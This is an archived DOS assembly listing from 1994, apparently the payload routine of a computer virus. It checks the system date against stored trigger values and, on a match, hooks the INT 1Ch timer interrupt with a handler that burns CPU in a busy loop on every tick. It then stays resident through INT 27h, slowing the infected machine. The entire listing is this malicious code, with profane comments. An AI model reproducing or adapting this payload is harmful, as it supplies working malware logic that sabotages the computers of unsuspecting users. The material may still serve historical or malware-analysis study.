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Text File  |  1994-01-01  |  2KB  |  43 lines

  1. ;---------------------------------
  2. action:                          ; 
  3. MOV AH,2AH                       ;        
  4. INT 21H                          ;get date           
  5. CMP Dl,byte ptr cs:[action_dia+bp]  ;is equal to my day?                 
  6. JE  cont                         ;nop! fuck ret          
  7. cmp byte ptr cs:[action_dia+bp],32  ;
  8. jne no_day                       ;
  9. cont:                            ; 
  10. cmp dh,byte ptr cs:[action_mes+bp]  ;is equal to my month?            
  11. je set                           ;
  12. cmp byte ptr cs:[action_mes+bp],13  ;
  13. jne NO_DAY                       ;nop! fuck ret           
  14. set:                             ; 
  16. mov ax,351ch                     ;
  17. int 21h                          ;store the int 1ch vectors 
  18. mov word ptr [trampaint+bp],bx      ;in cs:trampaint
  19. mov word ptr [trampaint+2+bp],es    ;
  20. mov ax,251ch                     ;put the int 1ch (clock) vector     
  21. push cs                          ;   
  22. pop ds                           ;  
  23. mov dx,offset tardar             ;in offset tardar
  24. int 21h                          ;  
  25. mov dx,offset fin                ;
  26. int 27h                          ;main resident the code
  27. NO_DAY:                          ;             
  28. ret                              ;ret for program
  29. tardar:                          ;int 1c handler
  30. pushf                            ;
  31. pusha                            ;
  32. mov cx,0ffffh                    ;fuck loop for slow speed
  33. trampa:                          ;
  34. mov ax,ax                        ;
  35. loop trampa                      ;
  36. popa                             ;
  37. popf                             ;
  38. JMP dword ptr CS:[trampaint+bp]     ;jmp to original int 1ch
  39. ret                              ;
  40. trampaint  dd  ?                 ;
  41. ;--------------------------------;